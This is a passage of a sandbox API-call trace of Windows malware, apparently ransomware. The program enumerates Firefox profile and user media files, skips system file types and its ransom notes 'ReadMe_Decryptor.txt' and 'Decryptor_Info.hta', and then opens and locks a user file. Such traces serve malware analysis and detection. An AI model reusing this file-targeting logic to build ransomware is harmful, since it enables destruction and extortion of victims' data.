hHeap=0x6d0000) returned 1 [0085.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d260 [0085.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.399] PathFindExtensionW (pszPath="secmod.db") returned=".db" [0085.399] lstrcmpiW (lpString1=".db", lpString2=".exe") returned -1 [0085.399] lstrcmpiW (lpString1=".db", lpString2=".sys") returned -1 [0085.399] lstrcmpiW (lpString1=".db", lpString2=".lnk") returned -1 [0085.399] lstrcmpiW (lpString1=".db", lpString2=".dll") returned -1 [0085.400] lstrcmpiW (lpString1=".db", lpString2=".msi") returned -1 [0085.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75cc10 [0085.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d338 [0085.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.400] PathFindExtensionW (pszPath="sessionstore.bak") returned=".bak" [0085.400] lstrcmpiW (lpString1=".bak", lpString2=".exe") returned -1 [0085.400] lstrcmpiW (lpString1=".bak", lpString2=".sys") returned -1 [0085.400] lstrcmpiW (lpString1=".bak", lpString2=".lnk") returned -1 [0085.400] lstrcmpiW (lpString1=".bak", lpString2=".dll") returned -1 [0085.400] lstrcmpiW (lpString1=".bak", lpString2=".msi") returned -1 [0085.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75cc10 [0085.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f1e8 [0085.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.400] PathFindExtensionW (pszPath="sessionstore.js") returned=".js" [0085.401] lstrcmpiW (lpString1=".js", lpString2=".exe") returned 1 [0085.401] lstrcmpiW (lpString1=".js", lpString2=".sys") returned -1 [0085.401] lstrcmpiW (lpString1=".js", lpString2=".lnk") returned -1 [0085.401] lstrcmpiW (lpString1=".js", lpString2=".dll") returned 1 [0085.401] lstrcmpiW (lpString1=".js", lpString2=".msi") returned -1 [0085.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75cc10 [0085.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d410 [0085.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.401] PathFindExtensionW (pszPath="signons.sqlite") returned=".sqlite" [0085.401] lstrcmpiW (lpString1=".sqlite", lpString2=".exe") returned 1 [0085.401] lstrcmpiW (lpString1=".sqlite", lpString2=".sys") returned -1 [0085.401] lstrcmpiW (lpString1=".sqlite", lpString2=".lnk") returned 1 [0085.401] lstrcmpiW (lpString1=".sqlite", lpString2=".dll") returned 1 [0085.401] lstrcmpiW (lpString1=".sqlite", lpString2=".msi") returned 1 [0085.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75cc10 [0085.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d4e8 [0085.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.402] PathFindExtensionW (pszPath="times.json") returned=".json" [0085.402] lstrcmpiW (lpString1=".json", lpString2=".exe") returned 1 [0085.402] lstrcmpiW (lpString1=".json", lpString2=".sys") returned -1 [0085.402] lstrcmpiW (lpString1=".json", lpString2=".lnk") returned -1 [0085.402] lstrcmpiW (lpString1=".json", lpString2=".dll") returned 1 [0085.402] lstrcmpiW (lpString1=".json", lpString2=".msi") returned -1 [0085.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75cc10 [0085.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d5c0 [0085.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.402] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x7810d0 [0085.404] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.404] PathFindExtensionW (pszPath="webapps.json") returned=".json" [0085.404] lstrcmpiW (lpString1=".json", lpString2=".exe") returned 1 [0085.404] lstrcmpiW (lpString1=".json", lpString2=".sys") returned -1 [0085.404] lstrcmpiW (lpString1=".json", lpString2=".lnk") returned -1 [0085.404] lstrcmpiW (lpString1=".json", lpString2=".dll") returned 1 [0085.404] lstrcmpiW (lpString1=".json", lpString2=".msi") returned -1 [0085.404] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d698 [0085.404] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x75c910 [0085.404] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d698 | out: hHeap=0x6d0000) returned 1 [0085.404] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f2d0 [0085.404] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.404] PathFindExtensionW (pszPath="webappsstore.sqlite") returned=".sqlite" [0085.405] lstrcmpiW (lpString1=".sqlite", lpString2=".exe") returned 1 [0085.405] lstrcmpiW (lpString1=".sqlite", lpString2=".sys") returned -1 [0085.405] lstrcmpiW (lpString1=".sqlite", lpString2=".lnk") returned 1 [0085.405] lstrcmpiW (lpString1=".sqlite", lpString2=".dll") returned 1 [0085.405] lstrcmpiW (lpString1=".sqlite", lpString2=".msi") returned 1 [0085.405] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75cc10 [0085.405] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75c910 [0085.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.405] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f3b8 [0085.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c910 | out: hHeap=0x6d0000) returned 1 [0085.408] PathFindExtensionW (pszPath="profiles.ini") returned=".ini" [0085.408] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0085.408] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0085.408] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0085.408] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0085.408] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0085.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7810d0 [0085.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x75cc10 [0085.408] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7810d0 | out: hHeap=0x6d0000) returned 1 [0085.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x75c910 [0085.408] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75cc10 | out: hHeap=0x6d0000) returned 1 [0085.410] PathFindExtensionW (pszPath="nEi dQUS.odp") returned=".odp" [0085.410] lstrcmpiW (lpString1=".odp", lpString2=".exe") returned 1 [0085.410] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0085.410] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0085.411] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0085.411] lstrcmpiW (lpString1=".odp", lpString2=".msi") returned 1 [0085.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0085.411] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7810d0 [0085.411] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.411] PathFindExtensionW (pszPath="qgznLSG.gif") returned=".gif" [0085.411] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0085.411] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0085.411] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0085.411] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0085.411] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0085.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0085.411] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x75c9b8 [0085.411] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.411] PathFindExtensionW (pszPath="s7ccjbJMPdH_Z.mp3") returned=".mp3" [0085.411] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0085.412] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0085.412] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0085.412] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0085.412] lstrcmpiW (lpString1=".mp3", lpString2=".msi") returned -1 [0085.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0085.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x75ca40 [0085.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.412] PathFindExtensionW (pszPath="tHkEVoRBe9H2c1YrZiU.m4a") returned=".m4a" [0085.412] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0085.412] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0085.412] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0085.412] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0085.412] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0085.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0085.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75cc10 [0085.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.413] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x62e9de0, ftCreationTime.dwHighDateTime=0x1d5dd9d, ftLastAccessTime.dwLowDateTime=0x40923090, ftLastAccessTime.dwHighDateTime=0x1d5df83, ftLastWriteTime.dwLowDateTime=0x40923090, ftLastWriteTime.dwHighDateTime=0x1d5df83, nFileSizeHigh=0x0, nFileSizeLow=0xea32, dwReserved0=0x0, dwReserved1=0x0, cFileName="tykbhefC09YpuJ6GZ.odt", cAlternateFileName="TYKBHE~1.ODT")) returned 1 [0085.413] lstrcmpW (lpString1="tykbhefC09YpuJ6GZ.odt", lpString2=".") returned 1 [0085.413] lstrcmpW (lpString1="tykbhefC09YpuJ6GZ.odt", lpString2="..") returned 1 [0085.413] lstrcmpiW (lpString1="tykbhefC09YpuJ6GZ.odt", lpString2="ReadMe_Decryptor.txt") returned 1 [0085.413] lstrcmpiW (lpString1="tykbhefC09YpuJ6GZ.odt", lpString2="Decryptor_Info.hta") returned 1 [0085.413] PathFindExtensionW (pszPath="tykbhefC09YpuJ6GZ.odt") returned=".odt" [0085.413] lstrcmpiW (lpString1=".odt", lpString2=".exe") returned 1 [0085.413] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0085.413] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0085.413] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0085.413] lstrcmpiW (lpString1=".odt", lpString2=".msi") returned 1 [0085.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0085.414] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.414] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ed38 [0085.414] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.414] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe085f850, ftCreationTime.dwHighDateTime=0x1d5da76, ftLastAccessTime.dwLowDateTime=0xead7ddd0, ftLastAccessTime.dwHighDateTime=0x1d5dd52, ftLastWriteTime.dwLowDateTime=0xead7ddd0, ftLastWriteTime.dwHighDateTime=0x1d5dd52, nFileSizeHigh=0x0, nFileSizeLow=0x26ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="v4NVTaF zeyByjM.m4a", cAlternateFileName="V4NVTA~1.M4A")) returned 1 [0085.414] lstrcmpW (lpString1="v4NVTaF zeyByjM.m4a", lpString2=".") returned 1 [0085.414] lstrcmpW (lpString1="v4NVTaF zeyByjM.m4a", lpString2="..") returned 1 [0085.414] lstrcmpiW (lpString1="v4NVTaF zeyByjM.m4a", lpString2="ReadMe_Decryptor.txt") returned 1 [0085.414] lstrcmpiW (lpString1="v4NVTaF zeyByjM.m4a", lpString2="Decryptor_Info.hta") returned 1 [0085.414] PathFindExtensionW (pszPath="v4NVTaF zeyByjM.m4a") returned=".m4a" [0085.414] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0085.414] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0085.414] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0085.415] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0085.415] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0085.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0085.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75edd0 [0085.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.415] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58bb1fd0, ftCreationTime.dwHighDateTime=0x1d5da68, ftLastAccessTime.dwLowDateTime=0x66cdbec0, ftLastAccessTime.dwHighDateTime=0x1d5ddb0, ftLastWriteTime.dwLowDateTime=0x66cdbec0, ftLastWriteTime.dwHighDateTime=0x1d5ddb0, nFileSizeHigh=0x0, nFileSizeLow=0x13807, dwReserved0=0x0, dwReserved1=0x0, cFileName="xfIlkCQ8.odp", cAlternateFileName="")) returned 1 [0085.415] lstrcmpW (lpString1="xfIlkCQ8.odp", lpString2=".") returned 1 [0085.415] lstrcmpW (lpString1="xfIlkCQ8.odp", lpString2="..") returned 1 [0085.415] lstrcmpiW (lpString1="xfIlkCQ8.odp", lpString2="ReadMe_Decryptor.txt") returned 1 [0085.415] lstrcmpiW (lpString1="xfIlkCQ8.odp", lpString2="Decryptor_Info.hta") returned 1 [0085.415] PathFindExtensionW (pszPath="xfIlkCQ8.odp") returned=".odp" [0085.415] lstrcmpiW (lpString1=".odp", lpString2=".exe") returned 1 [0085.415] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0085.415] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0085.415] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0085.415] lstrcmpiW (lpString1=".odp", lpString2=".msi") returned 1 [0085.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0085.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x75cca8 [0085.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.416] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d786640, ftCreationTime.dwHighDateTime=0x1d5dd13, ftLastAccessTime.dwLowDateTime=0x5ded4900, ftLastAccessTime.dwHighDateTime=0x1d5df05, ftLastWriteTime.dwLowDateTime=0x5ded4900, ftLastWriteTime.dwHighDateTime=0x1d5df05, nFileSizeHigh=0x0, nFileSizeLow=0x213b, dwReserved0=0x0, dwReserved1=0x0, cFileName="xrTxPw8CKhYxpcSJV.m4a", cAlternateFileName="XRTXPW~1.M4A")) returned 1 [0085.416] lstrcmpW (lpString1="xrTxPw8CKhYxpcSJV.m4a", lpString2=".") returned 1 [0085.416] lstrcmpW (lpString1="xrTxPw8CKhYxpcSJV.m4a", lpString2="..") returned 1 [0085.416] lstrcmpiW (lpString1="xrTxPw8CKhYxpcSJV.m4a", lpString2="ReadMe_Decryptor.txt") returned 1 [0085.416] lstrcmpiW (lpString1="xrTxPw8CKhYxpcSJV.m4a", lpString2="Decryptor_Info.hta") returned 1 [0085.416] PathFindExtensionW (pszPath="xrTxPw8CKhYxpcSJV.m4a") returned=".m4a" [0085.416] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0085.416] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0085.416] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0085.416] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0085.416] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0085.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0085.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ee68 [0085.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.417] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd624b090, ftCreationTime.dwHighDateTime=0x1d5db6b, ftLastAccessTime.dwLowDateTime=0x7965d3a0, ftLastAccessTime.dwHighDateTime=0x1d5dcb7, ftLastWriteTime.dwLowDateTime=0x7965d3a0, ftLastWriteTime.dwHighDateTime=0x1d5dcb7, nFileSizeHigh=0x0, nFileSizeLow=0x1578f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZNdVz.gif", cAlternateFileName="")) returned 1 [0085.417] lstrcmpW (lpString1="ZNdVz.gif", lpString2=".") returned 1 [0085.417] lstrcmpW (lpString1="ZNdVz.gif", lpString2="..") returned 1 [0085.417] lstrcmpiW (lpString1="ZNdVz.gif", lpString2="ReadMe_Decryptor.txt") returned 1 [0085.417] lstrcmpiW (lpString1="ZNdVz.gif", lpString2="Decryptor_Info.hta") returned 1 [0085.417] PathFindExtensionW (pszPath="ZNdVz.gif") returned=".gif" [0085.417] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0085.417] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0085.417] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0085.417] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0085.417] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0085.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0085.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x75ef00 [0085.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.417] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd624b090, ftCreationTime.dwHighDateTime=0x1d5db6b, ftLastAccessTime.dwLowDateTime=0x7965d3a0, ftLastAccessTime.dwHighDateTime=0x1d5dcb7, ftLastWriteTime.dwLowDateTime=0x7965d3a0, ftLastWriteTime.dwHighDateTime=0x1d5dcb7, nFileSizeHigh=0x0, nFileSizeLow=0x1578f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZNdVz.gif", cAlternateFileName="")) returned 0 [0085.417] FindClose (in: hFindFile=0x709a08 | out: hFindFile=0x709a08) returned 1 [0085.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1fGwisp8jCt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1fgwisp8jct.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0085.418] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xf637 [0085.418] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf757, nNumberOfBytesToLockHigh=0x0) returned 1 [0085.418] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.419] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0085.420] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.420] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200023) returned 0x9b0020 [0085.637] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.637] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0085.637] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0085.637] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.637] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0085.637] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0085.637] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0085.637] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.637] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0085.638] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0085.638] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0085.638] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.638] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0085.638] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0085.638] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0085.638] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0085.638] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0085.638] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0085.638] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0085.638] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0085.638] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0085.638] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0085.638] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0085.638] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0085.638] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0085.638] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.639] RtlAllocateHeap 